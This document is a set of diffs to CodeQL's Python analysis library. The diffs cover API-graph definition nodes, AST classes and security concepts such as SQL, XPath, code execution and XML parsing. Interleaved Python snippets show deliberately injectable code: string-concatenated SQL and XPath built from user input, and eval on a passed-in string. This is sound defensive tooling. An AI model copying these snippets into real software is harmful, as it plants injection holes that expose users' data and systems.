/** Gets the API node for the `i`th parameter of this invocation. */
pragma[nomagic]
Node getParameter(int i) {
result = callee.getParameter(i) and
result = this.getAParameterCandidate(i)
}
/**
* Gets an API node where a RHS of the node is the `i`th argument to this call.
*/
pragma[noinline]
private Node getAParameterCandidate(int i) { result.getARhs() = this.getArg(i) }
/** Gets the API node for a parameter of this invocation. */
Node getAParameter() { result = this.getParameter(_) }
/** Gets the API node for the keyword parameter `name` of this invocation. */
Node getKeywordParameter(string name) {
result = callee.getKeywordParameter(name) and
result = this.getAKeywordParameterCandidate(name)
}
/** Gets the API node for the parameter that has index `i` or has keyword `name`. */
bindingset[i, name]
Node getParameter(int i, string name) {
result = this.getParameter(i)
or
result = this.getKeywordParameter(name)
}
pragma[noinline]
private Node getAKeywordParameterCandidate(string name) {
result.getARhs() = this.getArgByName(name)
}
/** Gets the API node for the return value of this call. */
Node getReturn() {
result = callee.getReturn() and
result.getAnImmediateUse() = this
}
}
/**
* Provides the actual implementation of API graphs, cached for performance.
*
@@ -312,23 +434,26 @@ module API {
/** An abstract representative for imports of the module called `name`. */
MkModuleImport(string name) {
// Ignore the following module name for Python 2, as we alias `__builtin__` to `builtins` elsewhere
(name != "__builtin__" or major_version() = 3) and
(name != "__builtin__" or PY::major_version() = 3) and
(
imports(_, name)
or
// When we `import foo.bar.baz` we want to create API graph nodes also for the prefixes
// `foo` and `foo.bar`:
name = any(ImportExpr e | not e.isRelative()).getAnImportedModuleName()
name = any(PY::ImportExpr e | not e.isRelative()).getAnImportedModuleName()
)
or
// The `builtins` module should always be implicitly available
name = "builtins"
} or
/** A use of an API member at the node `nd`. */
MkUse(DataFlow::Node nd) { use(_, _, nd) }
MkUse(DataFlow::Node nd) { use(_, _, nd) } or
MkDef(DataFlow::Node nd) { rhs(_, _, nd) }
class TUse = MkModuleImport or MkUse;
class TDef = MkDef;
/**
* Holds if the dotted module name `sub` refers to the `member` member of `base`.
*
@@ -351,7 +476,7 @@ module API {
* Ignores relative imports, such as `from ..foo.bar import baz`.
*/
private predicate imports(DataFlow::Node imp, string name) {
exists(ImportExprNode iexpr |
exists(PY::ImportExprNode iexpr |
imp.asCfgNode() = iexpr and
not iexpr.getNode().isRelative() and
name = iexpr.getNode().getImportedModuleName()
@@ -374,13 +499,55 @@ module API {
*
* `moduleImport("foo").getMember("bar")`
*/
private TApiNode potential_import_star_base(Scope s) {
private TApiNode potential_import_star_base(PY::Scope s) {
exists(DataFlow::Node n |
n.asCfgNode() = ImportStar::potentialImportStarBase(s) and
use(result, n)
)
}
/**
* Holds if `rhs` is the right-hand side of a definition of a node that should have an
* incoming edge from `base` labeled `lbl` in the API graph.
*/
cached
predicate rhs(TApiNode base, Label::ApiLabel lbl, DataFlow::Node rhs) {
exists(DataFlow::Node def, DataFlow::LocalSourceNode pred |
rhs(base, def) and pred = trackDefNode(def)
|
// from `x` to a definition of `x.prop`
exists(DataFlow::AttrWrite aw | aw = pred.getAnAttributeWrite() |
lbl = Label::memberFromRef(aw) and
rhs = aw.getValue()
)
or
// TODO: I had expected `DataFlow::AttrWrite` to contain the attribute writes from a dict, that's how JS works.
exists(PY::Dict dict, PY::KeyValuePair item |
dict = pred.asExpr() and
dict.getItem(_) = item and
lbl = Label::member(item.getKey().(PY::StrConst).getS()) and
rhs.asExpr() = item.getValue()
)
or
exists(PY::CallableExpr fn | fn = pred.asExpr() |
not fn.getInnerScope().isAsync() and
lbl = Label::return() and
exists(PY::Return ret |
rhs.asExpr() = ret.getValue() and
ret.getScope() = fn.getInnerScope()
)
)
)
or
argumentPassing(base, lbl, rhs)
or
exists(DataFlow::LocalSourceNode src, DataFlow::AttrWrite aw |
use(base, src) and aw = trackUseNode(src).getAnAttributeWrite() and rhs = aw.getValue()
|
lbl = Label::memberFromRef(aw)
)
}
/**
* Holds if `ref` is a use of a node that should have an incoming edge from `base` labeled
* `lbl` in the API graph.
@@ -399,7 +566,7 @@ module API {
|
// Referring to an attribute on a node that is a use of `base`:
lbl = Label::memberFromRef(ref) and
ref = pred.getAnAttributeReference()
ref = pred.getAnAttributeRead()
or
// Calling a node that is a use of `base`
lbl = Label::return() and
@@ -408,7 +575,7 @@ module API {
// Subclassing a node
lbl = Label::subclass() and
exists(DataFlow::Node superclass | pred.flowsTo(superclass) |
ref.asExpr().(ClassExpr).getABase() = superclass.asExpr()
ref.asExpr().(PY::ClassExpr).getABase() = superclass.asExpr()
)
or
// awaiting
@@ -419,12 +586,26 @@ module API {
)
)
or
exists(DataFlow::Node def, PY::CallableExpr fn |
rhs(base, def) and fn = trackDefNode(def).asExpr()
|
exists(int i |
lbl = Label::parameter(i) and
ref.asExpr() = fn.getInnerScope().getArg(i)
)
or
exists(string name |
lbl = Label::keywordParameter(name) and
ref.asExpr() = fn.getInnerScope().getArgByName(name)
)
)
or
// Built-ins, treated as members of the module `builtins`
base = MkModuleImport("builtins") and
lbl = Label::member(any(string name | ref = Builtins::likelyBuiltin(name)))
or
// Unknown variables that may belong to a module imported with `import *`
exists(Scope s |
exists(PY::Scope s |
base = potential_import_star_base(s) and
lbl =
Label::member(any(string name |
@@ -444,7 +625,7 @@ module API {
)
or
// Ensure the Python 2 `__builtin__` module gets the name of the Python 3 `builtins` module.
major_version() = 2 and
PY::major_version() = 2 and
nd = MkModuleImport("builtins") and
imports(ref, "__builtin__")
or
@@ -466,6 +647,42 @@ module API {
exists(DataFlow::TypeTracker t2 | result = trackUseNode(src, t2).track(t2, t))
}
/**
* Holds if `arg` is passed as an argument to a use of `base`.
*
* `lbl` represents which parameter of the function the argument was passed to: either a numbered parameter or a keyword parameter.
*/
private predicate argumentPassing(TApiNode base, Label::ApiLabel lbl, DataFlow::Node arg) {
exists(DataFlow::Node use, DataFlow::LocalSourceNode pred |
use(base, use) and pred = trackUseNode(use)
|
exists(int i |
lbl = Label::parameter(i) and
arg = pred.getACall().getArg(i)
)
or
exists(string name | lbl = Label::keywordParameter(name) |
arg = pred.getACall().getArgByName(name)
)
)
}
/**
* Gets a node that inter-procedurally flows into `nd`, which is a definition of some node.
*/
cached
DataFlow::LocalSourceNode trackDefNode(DataFlow::Node nd) {
result = trackDefNode(nd, DataFlow::TypeBackTracker::end())
}
private DataFlow::LocalSourceNode trackDefNode(DataFlow::Node nd, DataFlow::TypeBackTracker t) {
t.start() and
rhs(_, nd) and
result = nd.getALocalSource()
or
exists(DataFlow::TypeBackTracker t2 | result = trackDefNode(nd, t2).backtrack(t2, t))
}
/**
* Gets a data-flow node to which `src`, which is a use of an API-graph node, flows.
*
@@ -473,10 +690,17 @@ module API {
*/
cached
DataFlow::LocalSourceNode trackUseNode(DataFlow::LocalSourceNode src) {
Stages::TypeTracking::ref() and
result = trackUseNode(src, DataFlow::TypeTracker::end()) and
not result instanceof DataFlow::ModuleVariableNode
}
/**
* Holds if `rhs` is the right-hand side of a definition of node `nd`.
*/
cached
predicate rhs(TApiNode nd, DataFlow::Node rhs) { nd = MkDef(rhs) }
/**
* Holds if there is an edge from `pred` to `succ` in the API graph that is labeled with `lbl`.
*/
@@ -485,8 +709,7 @@ module API {
/* There's an edge from the root node for each imported module. */
exists(string m |
pred = MkRoot() and
lbl = Label::mod(m)
|
lbl = Label::mod(m) and
succ = MkModuleImport(m) and
// Only allow undotted names to count as base modules.
not m.matches("%.%")
@@ -503,6 +726,11 @@ module API {
use(pred, lbl, ref) and
succ = MkUse(ref)
)
or
exists(DataFlow::Node rhs |
rhs(pred, lbl, rhs) and
succ = MkDef(rhs)
)
}
/**
@@ -530,23 +758,34 @@ module API {
private import semmle.python.dataflow.new.internal.ImportStar
newtype TLabel =
MkLabelModule(string mod) { exists(Impl::MkModuleImport(mod)) } or
MkLabelModule(string mod) {
exists(Impl::MkModuleImport(mod)) and
not mod.matches("%.%") // only top level modules count as base modules
} or
MkLabelMember(string member) {
member = any(DataFlow::AttrRef pr).getAttributeName() or
exists(Builtins::likelyBuiltin(member)) or
ImportStar::namePossiblyDefinedInImportStar(_, member, _) or
Impl::prefix_member(_, member, _)
Impl::prefix_member(_, member, _) or
member = any(PY::Dict d).getAnItem().(PY::KeyValuePair).getKey().(PY::StrConst).getS()
} or
MkLabelUnknownMember() or
MkLabelParameter(int i) {
none() // TODO: Fill in when adding def nodes
exists(any(DataFlow::CallCfgNode c).getArg(i))
or
exists(any(PY::Function f).getArg(i))
} or
MkLabelKeywordParameter(string name) {
exists(any(DataFlow::CallCfgNode c).getArgByName(name))
or
exists(any(PY::Function f).getArgByName(name))
} or
MkLabelReturn() or
MkLabelSubclass() or
MkLabelAwait()
/** A label for a module. */
class LabelModule extends ApiLabel {
class LabelModule extends ApiLabel, MkLabelModule {
string mod;
LabelModule() { this = MkLabelModule(mod) }
@@ -558,7 +797,7 @@ module API {
}
/** A label for the member named `prop`. */
class LabelMember extends ApiLabel {
class LabelMember extends ApiLabel, MkLabelMember {
string member;
LabelMember() { this = MkLabelMember(member) }
@@ -570,14 +809,12 @@ module API {
}
/** A label for a member with an unknown name. */
class LabelUnknownMember extends ApiLabel {
LabelUnknownMember() { this = MkLabelUnknownMember() }
class LabelUnknownMember extends ApiLabel, MkLabelUnknownMember {
override string toString() { result = "getUnknownMember()" }
}
/** A label for parameter `i`. */
class LabelParameter extends ApiLabel {
class LabelParameter extends ApiLabel, MkLabelParameter {
int i;
LabelParameter() { this = MkLabelParameter(i) }
@@ -588,24 +825,30 @@ module API {
int getIndex() { result = i }
}
/** A label that gets the return value of a function. */
class LabelReturn extends ApiLabel {
LabelReturn() { this = MkLabelReturn() }
/** A label for a keyword parameter `name`. */
class LabelKeywordParameter extends ApiLabel, MkLabelKeywordParameter {
string name;
LabelKeywordParameter() { this = MkLabelKeywordParameter(name) }
override string toString() { result = "getKeywordParameter(\"" + name + "\")" }
/** Gets the name of the parameter for this label. */
string getName() { result = name }
}
/** A label that gets the return value of a function. */
class LabelReturn extends ApiLabel, MkLabelReturn {
override string toString() { result = "getReturn()" }
}
/** A label that gets the subclass of a class. */
class LabelSubclass extends ApiLabel {
LabelSubclass() { this = MkLabelSubclass() }
class LabelSubclass extends ApiLabel, MkLabelSubclass {
override string toString() { result = "getASubclass()" }
}
/** A label for awaited values. */
class LabelAwait extends ApiLabel {
LabelAwait() { this = MkLabelAwait() }
class LabelAwait extends ApiLabel, MkLabelAwait {
override string toString() { result = "getAwaited()" }
}
}
@@ -620,13 +863,19 @@ module API {
LabelUnknownMember unknownMember() { any() }
/** Gets the `member` edge label for the given attribute reference. */
ApiLabel memberFromRef(DataFlow::AttrRef pr) {
result = member(pr.getAttributeName())
ApiLabel memberFromRef(DataFlow::AttrRef ref) {
result = member(ref.getAttributeName())
or
not exists(pr.getAttributeName()) and
not exists(ref.getAttributeName()) and
result = unknownMember()
}
/** Gets the `parameter` edge label for parameter `i`. */
LabelParameter parameter(int i) { result.getIndex() = i }
/** Gets the `parameter` edge label for the keyword parameter `name`. */
LabelKeywordParameter keywordParameter(string name) { result.getName() = name }
/** Gets the `return` edge label. */
LabelReturn return() { any() }


@@ -1,6 +1,7 @@
import python
private import semmle.python.internal.CachedStages
/** Syntactic node (Class, Function, Module, Expr, Stmt or Comprehension) corresponding to a flow node */
/** A syntactic node (Class, Function, Module, Expr, Stmt or Comprehension) corresponding to a flow node */
abstract class AstNode extends AstNode_ {
/*
* Special comment for documentation generation.
@@ -17,9 +18,14 @@ abstract class AstNode extends AstNode_ {
* NOTE: For some statements and other purely syntactic elements,
* there may not be a `ControlFlowNode`
*/
ControlFlowNode getAFlowNode() { py_flow_bb_node(result, this, _, _) }
cached
ControlFlowNode getAFlowNode() {
Stages::AST::ref() and
py_flow_bb_node(result, this, _, _)
}
/** Gets the location for this AST node */
cached
Location getLocation() { none() }
/**
@@ -35,6 +41,7 @@ abstract class AstNode extends AstNode_ {
* Expr.getASubExpression(), Stmt.getASubStatement(), Stmt.getASubExpression() or
* Scope.getAStmt().
*/
cached
abstract AstNode getAChildNode();
/**
@@ -44,12 +51,16 @@ abstract class AstNode extends AstNode_ {
* Expr.getASubExpression(), Stmt.getASubStatement(), Stmt.getASubExpression() or
* Scope.getAStmt() applied to the parent.
*/
AstNode getParentNode() { result.getAChildNode() = this }
cached
AstNode getParentNode() {
Stages::AST::ref() and
result.getAChildNode() = this
}
/** Whether this contains `inner` syntactically */
predicate contains(AstNode inner) { this.getAChildNode+() = inner }
pragma[noinline]
pragma[nomagic]
private predicate containsInScope(AstNode inner, Scope scope) {
this.contains(inner) and
not inner instanceof Scope and
@@ -61,31 +72,31 @@ abstract class AstNode extends AstNode_ {
}
/* Parents */
/** Internal implementation class */
/** The parent of a `Function`. Internal implementation class */
class FunctionParent extends FunctionParent_ { }
/** Internal implementation class */
/** The parent of an `Arguments` node. Internal implementation class */
class ArgumentsParent extends ArgumentsParent_ { }
/** Internal implementation class */
/** The parent of an `ExprList`. Internal implementation class */
class ExprListParent extends ExprListParent_ { }
/** Internal implementation class */
/** The parent of an `ExprContext`. Internal implementation class */
class ExprContextParent extends ExprContextParent_ { }
/** Internal implementation class */
/** The parent of a `StmtList`. Internal implementation class */
class StmtListParent extends StmtListParent_ { }
/** Internal implementation class */
/** The parent of a `StrList`. Internal implementation class */
class StrListParent extends StrListParent_ { }
/** Internal implementation class */
/** The parent of an `Expr`. Internal implementation class */
class ExprParent extends ExprParent_ { }
/** Internal implementation class */
/** The parent of a `PatternList`. Internal implementation class */
class PatternListParent extends PatternListParent_ { }
/** Internal implementation class */
/** The parent of a `Pattern`. Internal implementation class */
class PatternParent extends PatternParent_ { }
class DictItem extends DictItem_, AstNode {
@@ -106,9 +117,16 @@ class Comprehension extends Comprehension_, AstNode {
override string toString() { result = "Comprehension" }
override Location getLocation() { result = Comprehension_.super.getLocation() }
override Location getLocation() {
Stages::AST::ref() and
result = Comprehension_.super.getLocation()
}
override AstNode getAChildNode() { result = this.getASubExpression() }
pragma[nomagic]
override AstNode getAChildNode() {
Stages::AST::ref() and
result = this.getASubExpression()
}
Expr getASubExpression() {
result = this.getIter() or
@@ -120,7 +138,7 @@ class Comprehension extends Comprehension_, AstNode {
class BytesOrStr extends BytesOrStr_ { }
/**
* Part of a string literal formed by implicit concatenation.
* A part of a string literal formed by implicit concatenation.
* For example the string literal "abc" expressed in the source as `"a" "b" "c"`
* would be composed of three `StringPart`s.
*/


@@ -85,12 +85,6 @@ class ClassDef extends Assign {
/** The scope of a class. This is the scope of all the statements within the class definition */
class Class extends Class_, Scope, AstNode {
/**
* Use getADecorator() instead of getDefinition().getADecorator()
* Use getMetaClass() instead of getDefinition().getMetaClass()
*/
deprecated ClassExpr getDefinition() { result = this.getParent() }
/** Gets a defined init method of this class */
Function getInitMethod() { result.getScope() = this and result.isInitMethod() }


@@ -59,7 +59,7 @@ class CommentBlock extends @py_comment {
/** Gets a textual representation of this element. */
string toString() { result = "Comment block" }
/** The length of this comment block (in comments) */
/** Gets the length of this comment block (in comments) */
int length() { result = max(int i | comment_block_part(this, _, i)) }
/**


@@ -76,22 +76,22 @@ class CompareOp extends int {
}
}
/** The `CompareOp` for "equals". */
/** Gets the `CompareOp` for "equals". */
CompareOp eq() { result = 1 }
/** The `CompareOp` for "not equals". */
/** Gets the `CompareOp` for "not equals". */
CompareOp ne() { result = 2 }
/** The `CompareOp` for "less than". */
/** Gets the `CompareOp` for "less than". */
CompareOp lt() { result = 3 }
/** The `CompareOp` for "less than or equal to". */
/** Gets the `CompareOp` for "less than or equal to". */
CompareOp le() { result = 4 }
/** The `CompareOp` for "greater than". */
/** Gets the `CompareOp` for "greater than". */
CompareOp gt() { result = 5 }
/** The `CompareOp` for "greater than or equal to". */
/** Gets the `CompareOp` for "greater than or equal to". */
CompareOp ge() { result = 6 }
/* Workaround precision limits in floating point numbers */


@@ -1,6 +1,6 @@
import python
/** Base class for list, set and dictionary comprehensions, and generator expressions. */
/** The base class for list, set and dictionary comprehensions, and generator expressions. */
abstract class Comp extends Expr {
abstract Function getFunction();


@@ -17,13 +17,9 @@ private import semmle.python.Frameworks
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SystemCommandExecution::Range` instead.
*/
class SystemCommandExecution extends DataFlow::Node {
SystemCommandExecution::Range range;
SystemCommandExecution() { this = range }
class SystemCommandExecution extends DataFlow::Node instanceof SystemCommandExecution::Range {
/** Gets the argument that specifies the command to be executed. */
DataFlow::Node getCommand() { result = range.getCommand() }
DataFlow::Node getCommand() { result = super.getCommand() }
}
/** Provides a class for modeling new system-command execution APIs. */
@@ -48,13 +44,9 @@ module SystemCommandExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `FileSystemAccess::Range` instead.
*/
class FileSystemAccess extends DataFlow::Node {
FileSystemAccess::Range range;
FileSystemAccess() { this = range }
class FileSystemAccess extends DataFlow::Node instanceof FileSystemAccess::Range {
/** Gets an argument to this file system access that is interpreted as a path. */
DataFlow::Node getAPathArgument() { result = range.getAPathArgument() }
DataFlow::Node getAPathArgument() { result = super.getAPathArgument() }
}
/** Provides a class for modeling new file system access APIs. */
@@ -78,14 +70,12 @@ module FileSystemAccess {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `FileSystemWriteAccess::Range` instead.
*/
class FileSystemWriteAccess extends FileSystemAccess {
override FileSystemWriteAccess::Range range;
class FileSystemWriteAccess extends FileSystemAccess instanceof FileSystemWriteAccess::Range {
/**
* Gets a node that represents data to be written to the file system (possibly with
* some transformation happening before it is written, like JSON encoding).
*/
DataFlow::Node getADataNode() { result = range.getADataNode() }
DataFlow::Node getADataNode() { result = super.getADataNode() }
}
/** Provides a class for modeling new file system writes. */
@@ -111,13 +101,9 @@ module Path {
* A data-flow node that performs path normalization. This is often needed in order
* to safely access paths.
*/
class PathNormalization extends DataFlow::Node {
PathNormalization::Range range;
PathNormalization() { this = range }
class PathNormalization extends DataFlow::Node instanceof PathNormalization::Range {
/** Gets an argument to this path normalization that is interpreted as a path. */
DataFlow::Node getPathArg() { result = range.getPathArg() }
DataFlow::Node getPathArg() { result = super.getPathArg() }
}
/** Provides a class for modeling new path normalization APIs. */
@@ -133,12 +119,10 @@ module Path {
}
/** A data-flow node that checks that a path is safe to access. */
class SafeAccessCheck extends DataFlow::BarrierGuard {
SafeAccessCheck::Range range;
SafeAccessCheck() { this = range }
override predicate checks(ControlFlowNode node, boolean branch) { range.checks(node, branch) }
class SafeAccessCheck extends DataFlow::BarrierGuard instanceof SafeAccessCheck::Range {
override predicate checks(ControlFlowNode node, boolean branch) {
SafeAccessCheck::Range.super.checks(node, branch)
}
}
/** Provides a class for modeling new path safety checks. */
@@ -160,22 +144,18 @@ module Path {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Decoding::Range` instead.
*/
class Decoding extends DataFlow::Node {
Decoding::Range range;
Decoding() { this = range }
class Decoding extends DataFlow::Node instanceof Decoding::Range {
/** Holds if this call may execute code embedded in its input. */
predicate mayExecuteInput() { range.mayExecuteInput() }
predicate mayExecuteInput() { super.mayExecuteInput() }
/** Gets an input that is decoded by this function. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the decoded data produced by this function. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/** Gets an identifier for the format this function decodes from, such as "JSON". */
string getFormat() { result = range.getFormat() }
string getFormat() { result = super.getFormat() }
}
/** Provides a class for modeling new decoding mechanisms. */
@@ -226,19 +206,15 @@ private class DecodingAdditionalTaintStep extends TaintTracking::AdditionalTaint
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Encoding::Range` instead.
*/
class Encoding extends DataFlow::Node {
Encoding::Range range;
Encoding() { this = range }
class Encoding extends DataFlow::Node instanceof Encoding::Range {
/** Gets an input that is encoded by this function. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the encoded data produced by this function. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/** Gets an identifier for the format this function decodes from, such as "JSON". */
string getFormat() { result = range.getFormat() }
string getFormat() { result = super.getFormat() }
}
/** Provides a class for modeling new encoding mechanisms. */
@@ -280,13 +256,9 @@ private class EncodingAdditionalTaintStep extends TaintTracking::AdditionalTaint
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Logging::Range` instead.
*/
class Logging extends DataFlow::Node {
Logging::Range range;
Logging() { this = range }
class Logging extends DataFlow::Node instanceof Logging::Range {
/** Gets an input that is logged. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
}
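For instance, the message arguments of a standard `logging` call are what `getAnInput()` would return (a sketch; `log_login` is a hypothetical name):
```python
import logging

logger = logging.getLogger(__name__)

def log_login(username):
    # `username` is an input that ends up in the log output.
    logger.info("login attempt for %s", username)
```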
/** Provides a class for modeling new logging mechanisms. */
@@ -309,13 +281,9 @@ module Logging {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CodeExecution::Range` instead.
*/
class CodeExecution extends DataFlow::Node {
CodeExecution::Range range;
CodeExecution() { this = range }
class CodeExecution extends DataFlow::Node instanceof CodeExecution::Range {
/** Gets the argument that specifies the code to be executed. */
DataFlow::Node getCode() { result = range.getCode() }
DataFlow::Node getCode() { result = super.getCode() }
}
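A one-line sketch of the shape a `CodeExecution` model points at (`run_snippet` is hypothetical):
```python
def run_snippet(snippet):
    # `snippet` is the code argument; evaluating it is dangerous if it is user-controlled.
    return eval(snippet)
```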
/** Provides a class for modeling new dynamic code execution APIs. */
@@ -334,6 +302,7 @@ module CodeExecution {
/**
* A data-flow node that constructs an SQL statement.
*
* Often, it is worthy of an alert if an SQL statement is constructed such that
* executing it would be a security risk.
*
@@ -342,24 +311,23 @@ module CodeExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SqlConstruction::Range` instead.
*/
class SqlConstruction extends DataFlow::Node {
SqlConstruction::Range range;
SqlConstruction() { this = range }
class SqlConstruction extends DataFlow::Node instanceof SqlConstruction::Range {
/** Gets the argument that specifies the SQL statements to be constructed. */
DataFlow::Node getSql() { result = range.getSql() }
DataFlow::Node getSql() { result = super.getSql() }
}
/** Provides a class for modeling new SQL execution APIs. */
module SqlConstruction {
/**
* A data-flow node that constructs an SQL statement.
*
* Often, it is worthy of an alert if an SQL statement is constructed such that
* executing it would be a security risk.
*
* If it is important that the SQL statement is indeed executed, then use `SQLExecution`.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `SqlExecution` instead.
* extend `SqlConstruction` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the argument that specifies the SQL statements to be constructed. */
@@ -376,13 +344,9 @@ module SqlConstruction {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SqlExecution::Range` instead.
*/
class SqlExecution extends DataFlow::Node {
SqlExecution::Range range;
SqlExecution() { this = range }
class SqlExecution extends DataFlow::Node instanceof SqlExecution::Range {
/** Gets the argument that specifies the SQL statements to be executed. */
DataFlow::Node getSql() { result = range.getSql() }
DataFlow::Node getSql() { result = super.getSql() }
}
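The construction/execution distinction in plain Python, using sqlite3 and hypothetical helpers: the string concatenation is the construction, `conn.execute` the execution, and the parameterized variant avoids the problem entirely.
```python
import sqlite3

def find_user(conn, username):
    # SQL construction: the statement text is built from user input.
    query = "SELECT * FROM users WHERE name = '" + username + "'"
    # SQL execution: the constructed statement is actually run.
    return conn.execute(query).fetchall()

def find_user_safely(conn, username):
    # Parameterized form: the user input never becomes part of the SQL text.
    return conn.execute("SELECT * FROM users WHERE name = ?", (username,)).fetchall()
```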
/** Provides a class for modeling new SQL execution APIs. */
@@ -408,22 +372,18 @@ module SqlExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RegexExecution::Range` instead.
*/
class RegexExecution extends DataFlow::Node {
RegexExecution::Range range;
RegexExecution() { this = range }
class RegexExecution extends DataFlow::Node instanceof RegexExecution::Range {
/** Gets the data flow node for the regex being executed by this node. */
DataFlow::Node getRegex() { result = range.getRegex() }
DataFlow::Node getRegex() { result = super.getRegex() }
/** Gets a dataflow node for the string to be searched or matched against. */
DataFlow::Node getString() { result = range.getString() }
DataFlow::Node getString() { result = super.getString() }
/**
* Gets the name of this regex execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = range.getName() }
string getName() { result = super.getName() }
}
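A sketch of a typical regex execution in Python: the first argument to `re.search` is the regex, the second the string it is matched against, and the name would be reported as `re.search`.
```python
import re

def looks_like_email(candidate):
    return re.search(r"[^@\s]+@[^@\s]+", candidate) is not None
```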
/** Provides classes for modeling new regular-expression execution APIs. */
@@ -449,6 +409,156 @@ module RegexExecution {
}
}
/** Provides classes for modeling XML-related APIs. */
module XML {
/**
* A data-flow node that constructs an XPath expression.
*
* Often, it is worthy of an alert if an XPath expression is constructed such that
* executing it would be a security risk.
*
* If it is important that the XPath expression is indeed executed, then use `XPathExecution`.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `XPathConstruction::Range` instead.
*/
class XPathConstruction extends DataFlow::Node instanceof XPathConstruction::Range {
/** Gets the argument that specifies the XPath expressions to be constructed. */
DataFlow::Node getXPath() { result = super.getXPath() }
/**
* Gets the name of this XPath expression construction, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = super.getName() }
}
/** Provides a class for modeling new XPath construction APIs. */
module XPathConstruction {
/**
* A data-flow node that constructs an XPath expression.
*
* Often, it is worthy of an alert if an XPath expression is constructed such that
* executing it would be a security risk.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XPathConstruction` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the argument that specifies the XPath expressions to be constructed. */
abstract DataFlow::Node getXPath();
/**
* Gets the name of this XPath expression construction, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
abstract string getName();
}
}
/**
* A data-flow node that executes an XPath expression.
*
* If the context of interest is such that merely constructing an XPath expression
* would be valuable to report, then consider using `XPathConstruction`.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `XPathExecution::Range` instead.
*/
class XPathExecution extends DataFlow::Node instanceof XPathExecution::Range {
/** Gets the data flow node for the XPath expression being executed by this node. */
DataFlow::Node getXPath() { result = super.getXPath() }
/**
* Gets the name of this XPath expression execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = super.getName() }
}
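Both XPath concepts in one Python sketch, assuming lxml as the executing library and hypothetical names:
```python
from lxml import etree

def find_user_element(doc_text, username):
    tree = etree.fromstring(doc_text)
    # XPath construction: the expression is built from (possibly tainted) user input.
    query = "//user[@name='" + username + "']"
    # XPath execution: lxml evaluates the constructed expression.
    return tree.xpath(query)
```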
/** Provides classes for modeling new XPath execution APIs. */
module XPathExecution {
/**
* A data-flow node that executes an XPath expression.
*
* If the context of interest is such that merely constructing an XPath expression
* would be valuable to report, then consider using `XPathConstruction`.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XPathExecution` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the data flow node for the XPath expression being executed by this node. */
abstract DataFlow::Node getXPath();
/**
* Gets the name of this XPath expression execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
abstract string getName();
}
}
/**
* A kind of XML vulnerability.
*
* See overview of kinds at https://pypi.org/project/defusedxml/#python-xml-libraries
*
* See PoC at `python/PoCs/XmlParsing/PoC.py` for some tests of vulnerable XML parsing.
*/
class XmlParsingVulnerabilityKind extends string {
XmlParsingVulnerabilityKind() { this in ["XML bomb", "XXE", "DTD retrieval"] }
/**
* Holds for the XML bomb vulnerability kind, which covers attacks such as 'Billion
* Laughs' and 'Quadratic Blowup'.
*
* While a parser could technically be vulnerable to one and not the other, from our
* point of view the interesting part is that it is vulnerable to this type of attack
* at all, not which specific variant works; in practice, parsers vulnerable to one
* tend to be vulnerable to the other as well.
*/
predicate isXmlBomb() { this = "XML bomb" }
/** Holds for the XXE vulnerability kind. */
predicate isXxe() { this = "XXE" }
/** Holds for the DTD retrieval vulnerability kind. */
predicate isDtdRetrieval() { this = "DTD retrieval" }
}
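For context, a hedged sketch of parsing untrusted XML so that none of the three kinds applies, assuming the defusedxml package:
```python
from defusedxml import DTDForbidden, EntitiesForbidden
import defusedxml.ElementTree as SafeET

def parse_untrusted(xml_text):
    # defusedxml rejects DTDs and entity declarations, which blocks the XML bomb,
    # XXE and DTD retrieval kinds above (exact behaviour depends on the flags used).
    try:
        return SafeET.fromstring(xml_text, forbid_dtd=True)
    except (DTDForbidden, EntitiesForbidden):
        return None
```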
/**
* A data-flow node that parses XML.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `XmlParsing::Range` instead.
*/
class XmlParsing extends Decoding instanceof XmlParsing::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
predicate vulnerableTo(XmlParsingVulnerabilityKind kind) { super.vulnerableTo(kind) }
}
/** Provides classes for modeling XML parsing APIs. */
module XmlParsing {
/**
* A data-flow node that parses XML.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XmlParsing` instead.
*/
abstract class Range extends Decoding::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
abstract predicate vulnerableTo(XmlParsingVulnerabilityKind kind);
override string getFormat() { result = "XML" }
}
}
}
/** Provides classes for modeling LDAP-related APIs. */
module LDAP {
/**
@@ -457,16 +567,12 @@ module LDAP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `LdapExecution::Range` instead.
*/
class LdapExecution extends DataFlow::Node {
LdapExecution::Range range;
LdapExecution() { this = range }
class LdapExecution extends DataFlow::Node instanceof LdapExecution::Range {
/** Gets the argument containing the filter string. */
